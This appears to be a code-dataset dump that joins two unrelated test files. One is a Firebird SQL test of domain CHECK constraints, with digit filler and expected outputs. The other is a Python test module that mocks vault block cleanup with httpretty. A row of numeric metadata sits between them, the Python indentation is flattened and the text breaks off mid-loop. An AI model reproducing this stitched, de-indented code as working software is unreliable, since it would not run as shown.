0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
012345678901234567
'
);
alter domain dom06_17 add constraint check( value =
'
'); -- several empty lines here
alter domain dom06_17 add constraint check( value =
'
') drop constraint;
alter domain dom06_17 add constraint check( value is not null );
----------------------------------------------------------------------------------------------------
create domain dom06_18 as boolean check( value = false);
alter domain dom06_18 add constraint check( value = true );
alter domain dom06_18 add constraint check( value is not null ) drop constraint;
alter domain dom06_18 add constraint check( value = false );
----------------------------------------------------------------------------------------------------
create domain dom06_19 as decfloat check( value >= -9.999999999999999999999999999999999E6144 );
alter domain dom06_19 add constraint check( value <= 9.999999999999999999999999999999999E6144 );
alter domain dom06_19 add constraint check( value is not null ) drop constraint;
alter domain dom06_19 add constraint check( value >= -1.0E-6143 );
----------------------------------------------------------------------------------------------------
commit;
set count on;
select * from v_test;
"""
act_1 = isql_act('db_1', test_script_1, substitutions=substitutions_1)
expected_stdout_1 = """
DM_NAME DOM06_01
DM_TYPE 7
DM_SUBTYPE 0
DM_FLEN 2
DM_FSCALE 0
DM_FPREC 0
DM_FCSET <null>
DM_FCOLL <null>
DM_FCHRLEN <null>
DM_FNULL <null>
DM_FVALID_BLOB_ID 2:1e6
check( value = 3 )
DM_FDEFAULT_BLOB_ID <null>
DM_NAME DOM06_02
DM_TYPE 8
DM_SUBTYPE 0
DM_FLEN 4
DM_FSCALE 0
DM_FPREC 0
DM_FCSET <null>
DM_FCOLL <null>
DM_FCHRLEN <null>
DM_FNULL <null>
DM_FVALID_BLOB_ID 2:1ea
check( value = 3 )
DM_FDEFAULT_BLOB_ID <null>
DM_NAME DOM06_03
DM_TYPE 16
DM_SUBTYPE 0
DM_FLEN 8
DM_FSCALE 0
DM_FPREC 0
DM_FCSET <null>
DM_FCOLL <null>
DM_FCHRLEN <null>
DM_FNULL <null>
DM_FVALID_BLOB_ID 2:1ee
check( value = 3 )
DM_FDEFAULT_BLOB_ID <null>
DM_NAME DOM06_04
DM_TYPE 12
DM_SUBTYPE <null>
DM_FLEN 4
DM_FSCALE 0
DM_FPREC <null>
DM_FCSET <null>
DM_FCOLL <null>
DM_FCHRLEN <null>
DM_FNULL <null>
DM_FVALID_BLOB_ID 2:1f2
check( value < current_date )
DM_FDEFAULT_BLOB_ID <null>
DM_NAME DOM06_05
DM_TYPE 13
DM_SUBTYPE <null>
DM_FLEN 4
DM_FSCALE 0
DM_FPREC <null>
DM_FCSET <null>
DM_FCOLL <null>
DM_FCHRLEN <null>
DM_FNULL <null>
DM_FVALID_BLOB_ID 2:1f6
check( value < current_time )
DM_FDEFAULT_BLOB_ID <null>
DM_NAME DOM06_06
DM_TYPE 28
DM_SUBTYPE <null>
DM_FLEN 8
DM_FSCALE 0
DM_FPREC <null>
DM_FCSET <null>
DM_FCOLL <null>
DM_FCHRLEN <null>
DM_FNULL <null>
DM_FVALID_BLOB_ID 2:1fa
check( value < '23:34:45.678 Pacific/Galapagos' )
DM_FDEFAULT_BLOB_ID <null>
DM_NAME DOM06_07
DM_TYPE 13
DM_SUBTYPE <null>
DM_FLEN 4
DM_FSCALE 0
DM_FPREC <null>
DM_FCSET <null>
DM_FCOLL <null>
DM_FCHRLEN <null>
DM_FNULL <null>
DM_FVALID_BLOB_ID 2:1fe
check( value < current_timestamp )
DM_FDEFAULT_BLOB_ID <null>
DM_NAME DOM06_08
DM_TYPE 29
DM_SUBTYPE <null>
DM_FLEN 12
DM_FSCALE 0
DM_FPREC <null>
DM_FCSET <null>
DM_FCOLL <null>
DM_FCHRLEN <null>
DM_FNULL <null>
DM_FVALID_BLOB_ID 2:202
check( value < '27.03.2015 23:34:45.678 Pacific/Galapagos' )
DM_FDEFAULT_BLOB_ID <null>
DM_NAME DOM06_09
DM_TYPE 14
DM_SUBTYPE 0
DM_FLEN 4
DM_FSCALE 0
DM_FPREC <null>
DM_FCSET 4
DM_FCOLL 0
DM_FCHRLEN 1
DM_FNULL <null>
DM_FVALID_BLOB_ID 2:206
check( value = '¢' )
DM_FDEFAULT_BLOB_ID <null>
DM_NAME DOM06_10
DM_TYPE 37
DM_SUBTYPE 0
DM_FLEN 4
DM_FSCALE 0
DM_FPREC <null>
DM_FCSET 4
DM_FCOLL 0
DM_FCHRLEN 1
DM_FNULL <null>
DM_FVALID_BLOB_ID 2:20a
check( value = '¢' )
DM_FDEFAULT_BLOB_ID <null>
DM_NAME DOM06_11
DM_TYPE 14
DM_SUBTYPE 0
DM_FLEN 1
DM_FSCALE 0
DM_FPREC <null>
DM_FCSET 21
DM_FCOLL 0
DM_FCHRLEN 1
DM_FNULL <null>
DM_FVALID_BLOB_ID 2:20e
check( value = 'Ÿ' )
DM_FDEFAULT_BLOB_ID <null>
DM_NAME DOM06_12
DM_TYPE 7
DM_SUBTYPE 1
DM_FLEN 2
DM_FSCALE -2
DM_FPREC 2
DM_FCSET <null>
DM_FCOLL <null>
DM_FCHRLEN <null>
DM_FNULL <null>
DM_FVALID_BLOB_ID 2:212
check( value = -327.68 )
DM_FDEFAULT_BLOB_ID <null>
DM_NAME DOM06_13
DM_TYPE 8
DM_SUBTYPE 2
DM_FLEN 4
DM_FSCALE -2
DM_FPREC 2
DM_FCSET <null>
DM_FCOLL <null>
DM_FCHRLEN <null>
DM_FNULL <null>
DM_FVALID_BLOB_ID 2:216
check( value = -327.68 )
DM_FDEFAULT_BLOB_ID <null>
DM_NAME DOM06_14
DM_TYPE 10
DM_SUBTYPE <null>
DM_FLEN 4
DM_FSCALE 0
DM_FPREC <null>
DM_FCSET <null>
DM_FCOLL <null>
DM_FCHRLEN <null>
DM_FNULL <null>
DM_FVALID_BLOB_ID 2:21a
check( value = 1.40129846432481707092372958328991613128026194187651577175706828388979108268586060148663818836212158203125e-45 )
DM_FDEFAULT_BLOB_ID <null>
DM_NAME DOM06_15
DM_TYPE 10
DM_SUBTYPE <null>
DM_FLEN 4
DM_FSCALE 0
DM_FPREC <null>
DM_FCSET <null>
DM_FCOLL <null>
DM_FCHRLEN <null>
DM_FNULL <null>
DM_FVALID_BLOB_ID 2:21e
check( value = 1.40129846432481707092372958328991613128026194187651577175706828388979108268586060148663818836212158203125e-45 )
DM_FDEFAULT_BLOB_ID <null>
DM_NAME DOM06_16
DM_TYPE 27
DM_SUBTYPE <null>
DM_FLEN 8
DM_FSCALE 0
DM_FPREC <null>
DM_FCSET <null>
DM_FCOLL <null>
DM_FCHRLEN <null>
DM_FNULL <null>
DM_FVALID_BLOB_ID 2:222
check( value >= 2e-308 )
DM_FDEFAULT_BLOB_ID <null>
DM_NAME DOM06_17
DM_TYPE 261
DM_SUBTYPE 0
DM_FLEN 8
DM_FSCALE 0
DM_FPREC <null>
DM_FCSET <null>
DM_FCOLL <null>
DM_FCHRLEN <null>
DM_FNULL <null>
DM_FVALID_BLOB_ID 2:226
check( value =
'
')
DM_FDEFAULT_BLOB_ID <null>
DM_NAME DOM06_18
DM_TYPE 23
DM_SUBTYPE <null>
DM_FLEN 1
DM_FSCALE 0
DM_FPREC <null>
DM_FCSET <null>
DM_FCOLL <null>
DM_FCHRLEN <null>
DM_FNULL <null>
DM_FVALID_BLOB_ID 2:22a
check( value is not null )
DM_FDEFAULT_BLOB_ID <null>
DM_NAME DOM06_19
DM_TYPE 25
DM_SUBTYPE <null>
DM_FLEN 16
DM_FSCALE 0
DM_FPREC 34
DM_FCSET <null>
DM_FCOLL <null>
DM_FCHRLEN <null>
DM_FNULL <null>
DM_FVALID_BLOB_ID 2:22e
check( value is not null )
DM_FDEFAULT_BLOB_ID <null>
Records affected: 19
"""
expected_stderr_1 = """
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_01 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_01 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_02 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_02 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_03 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_03 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_04 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_04 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_05 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_05 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_06 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_06 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_07 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_07 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_08 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_08 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_09 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_09 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_10 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_10 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_11 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_11 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_12 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_12 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_13 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_13 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_14 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_14 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_15 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_15 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_16 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_16 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_17 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_17 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_18 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_18 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_19 failed
-"Only one constraint allowed for a domain"
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-ALTER DOMAIN DOM06_19 failed
-"Only one constraint allowed for a domain"
"""
@pytest.mark.version('>=4.0')
def test_1(act_1: Action):
act_1.expected_stdout = expected_stdout_1
act_1.expected_stderr = expected_stderr_1
act_1.execute()
assert act_1.clean_stderr == act_1.clean_expected_stderr
assert act_1.clean_stdout == act_1.clean_expected_stdout
| 57.97479
| 285
| 0.640465
| 3,133
| 48,293
| 9.699968
| 0.103096
| 1.059559
| 1.579467
| 2.092794
| 0.902534
| 0.890128
| 0.889042
| 0.886015
| 0.837611
| 0.820829
| 0
| 0.53084
| 0.293645
| 48,293
| 832
| 286
| 58.044471
| 0.359727
| 0.045203
| 0
| 0.74507
| 0
| 0.015493
| 0.985383
| 0.412124
| 0
| 1
| 0
| 0
| 0.002817
| 1
| 0.001408
| false
| 0.001408
| 0.002817
| 0
| 0.004225
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 15
|
501e5428de25fc49f28add139cc65edd699495cf
| 12,442
|
py
|
Python
|
deucevalere/tests/test_convenience_functions_cleanup.py
|
BenjamenMeyer/deuce-valere
|
e9ba7d96825e81e51ddd5f99f1464990969a8f07
|
[
"Apache-2.0"
] | null | null | null |
deucevalere/tests/test_convenience_functions_cleanup.py
|
BenjamenMeyer/deuce-valere
|
e9ba7d96825e81e51ddd5f99f1464990969a8f07
|
[
"Apache-2.0"
] | null | null | null |
deucevalere/tests/test_convenience_functions_cleanup.py
|
BenjamenMeyer/deuce-valere
|
e9ba7d96825e81e51ddd5f99f1464990969a8f07
|
[
"Apache-2.0"
] | null | null | null |
"""
Deuce Valere - Tests - Functions - Vault Cleanup
"""
import ddt
from deuceclient.tests import *
import httpretty
from deucevalere import vault_validate, vault_cleanup
from deucevalere.tests import *
from deucevalere.tests.client_base import TestValereClientBase
from deucevalere.tests.client_base import calculate_ref_modified
@httpretty.activate
class TestConvenienceFunctions(TestValereClientBase):
def setUp(self):
super().setUp()
self.project_id = create_project_name()
self.vault_id = create_vault_name()
self.generate_blocks(count=20)
self.generate_orphaned_blocks(count=10)
self.secondary_setup(manager_start=None,
manager_end=None)
def tearDown(self):
super().tearDown()
def test_cleanup_no_expired_blocks(self):
with self.assertRaises(RuntimeError):
vault_cleanup(self.deuce_client,
self.vault,
self.manager)
def test_cleanup_no_orphaned_blocks(self):
self.manager.metadata.expired = []
with self.assertRaises(RuntimeError):
vault_cleanup(self.deuce_client,
self.vault,
self.manager)
def test_cleanup(self):
def metadata_listing_callback(request, uri, headers):
return self.metadata_block_listing_success(request,
uri,
headers)
def metadata_head_callback(request, uri, headers):
return self.metadata_block_head_success(request,
uri,
headers)
def metadata_delete_callback(request, uri, headers):
return (204, headers, '')
def storage_listing_callback(request, uri, headers):
return self.storage_block_listing_success(request,
uri,
headers)
def storage_delete_callback(request, uri, headers):
return (204, headers, '')
url = get_blocks_url(self.apihost, self.vault.vault_id)
httpretty.register_uri(httpretty.GET,
url,
body=metadata_listing_callback)
httpretty.register_uri(httpretty.HEAD,
self.get_metadata_block_pattern_matcher(),
body=metadata_head_callback)
httpretty.register_uri(httpretty.DELETE,
url,
body=metadata_delete_callback)
surl = get_storage_blocks_url(self.apihost, self.vault.vault_id)
httpretty.register_uri(httpretty.GET,
surl,
body=storage_listing_callback)
httpretty.register_uri(httpretty.DELETE,
self.get_storage_block_pattern_matcher(),
body=storage_delete_callback)
self.assertEqual(vault_validate(self.deuce_client,
self.vault,
self.manager),
0)
self.assertEqual(vault_cleanup(self.deuce_client,
self.vault,
self.manager),
0)
def test_cleanup_metadata_cleanup_error(self):
def metadata_listing_callback(request, uri, headers):
return self.metadata_block_listing_success(request,
uri,
headers)
def metadata_head_callback(request, uri, headers):
return self.metadata_block_head_success(request,
uri,
headers)
def metadata_delete_callback(request, uri, headers):
return (404, headers, 'mock failure')
def storage_listing_callback(request, uri, headers):
return self.storage_block_listing_success(request,
uri,
headers)
def storage_delete_callback(request, uri, headers):
return (204, headers, '')
url = get_blocks_url(self.apihost, self.vault.vault_id)
httpretty.register_uri(httpretty.GET,
url,
body=metadata_listing_callback)
httpretty.register_uri(httpretty.HEAD,
self.get_metadata_block_pattern_matcher(),
body=metadata_head_callback)
httpretty.register_uri(httpretty.DELETE,
url,
body=metadata_delete_callback)
surl = get_storage_blocks_url(self.apihost, self.vault.vault_id)
httpretty.register_uri(httpretty.GET,
surl,
body=storage_listing_callback)
httpretty.register_uri(httpretty.DELETE,
self.get_storage_block_pattern_matcher(),
body=storage_delete_callback)
base_age_date = datetime.datetime.utcnow()
key_set = sorted(
list(self.meta_data.keys()))[0:minmax(len(self.meta_data), 10)]
for key in key_set:
self.meta_data[key].ref_count = 0
self.meta_data[key].ref_modified = \
calculate_ref_modified(base=base_age_date,
days=0, hours=0, mins=1, secs=0)
self.manager.metadata.expired = []
for key in key_set[:int(len(key_set) / 2)]:
self.manager.metadata.expired.append(key)
self.manager.expire_age = datetime.timedelta(minutes=1)
check_count = 0
for key, block in self.meta_data.items():
check_delta = base_age_date - datetime.datetime.utcfromtimestamp(
block.ref_modified)
if check_delta > self.manager.expire_age and block.ref_count == 0:
check_count = check_count + 1
self.assertEqual(vault_validate(self.deuce_client,
self.vault,
self.manager),
0)
self.assertEqual(vault_cleanup(self.deuce_client,
self.vault,
self.manager),
1)
def test_cleanup_storage_cleanup_error(self):
def metadata_listing_callback(request, uri, headers):
return self.metadata_block_listing_success(request,
uri,
headers)
def metadata_head_callback(request, uri, headers):
return self.metadata_block_head_success(request,
uri,
headers)
def metadata_delete_callback(request, uri, headers):
return (204, headers, '')
def storage_listing_callback(request, uri, headers):
return self.storage_block_listing_success(request,
uri,
headers)
def storage_delete_callback(request, uri, headers):
return (404, headers, 'mock failure')
url = get_blocks_url(self.apihost, self.vault.vault_id)
httpretty.register_uri(httpretty.GET,
url,
body=metadata_listing_callback)
httpretty.register_uri(httpretty.HEAD,
self.get_metadata_block_pattern_matcher(),
body=metadata_head_callback)
httpretty.register_uri(httpretty.DELETE,
url,
body=metadata_delete_callback)
surl = get_storage_blocks_url(self.apihost, self.vault.vault_id)
httpretty.register_uri(httpretty.GET,
surl,
body=storage_listing_callback)
httpretty.register_uri(httpretty.DELETE,
self.get_storage_block_pattern_matcher(),
body=storage_delete_callback)
self.assertEqual(vault_validate(self.deuce_client,
self.vault,
self.manager),
0)
self.assertEqual(vault_cleanup(self.deuce_client,
self.vault,
self.manager),
2)
def test_cleanup_metadata_and_storage_cleanup_errors(self):
def metadata_listing_callback(request, uri, headers):
return self.metadata_block_listing_success(request,
uri,
headers)
def metadata_head_callback(request, uri, headers):
return self.metadata_block_head_success(request,
uri,
headers)
def metadata_delete_callback(request, uri, headers):
return (404, headers, 'mock failure')
def storage_listing_callback(request, uri, headers):
return self.storage_block_listing_success(request,
uri,
headers)
def storage_delete_callback(request, uri, headers):
return (404, headers, 'mock failure')
url = get_blocks_url(self.apihost, self.vault.vault_id)
httpretty.register_uri(httpretty.GET,
url,
body=metadata_listing_callback)
httpretty.register_uri(httpretty.HEAD,
self.get_metadata_block_pattern_matcher(),
body=metadata_head_callback)
httpretty.register_uri(httpretty.DELETE,
url,
body=metadata_delete_callback)
surl = get_storage_blocks_url(self.apihost, self.vault.vault_id)
httpretty.register_uri(httpretty.GET,
surl,
body=storage_listing_callback)
httpretty.register_uri(httpretty.DELETE,
self.get_storage_block_pattern_matcher(),
body=storage_delete_callback)
base_age_date = datetime.datetime.utcnow()
key_set = sorted(
list(self.meta_data.keys()))[0:minmax(len(self.meta_data), 10)]
for key in key_set:
self.meta_data[key].ref_count = 0
self.meta_data[key].ref_modified = \
calculate_ref_modified(base=base_age_date,
days=0, hours=0, mins=1, secs=0)
self.manager.metadata.expired = []
for key in key_set[:int(len(key_set) / 2)]:
self.manager.metadata.expired.append(key)
self.manager.expire_age = datetime.timedelta(minutes=1)
check_count = 0
for key, block in self.meta_data.items():
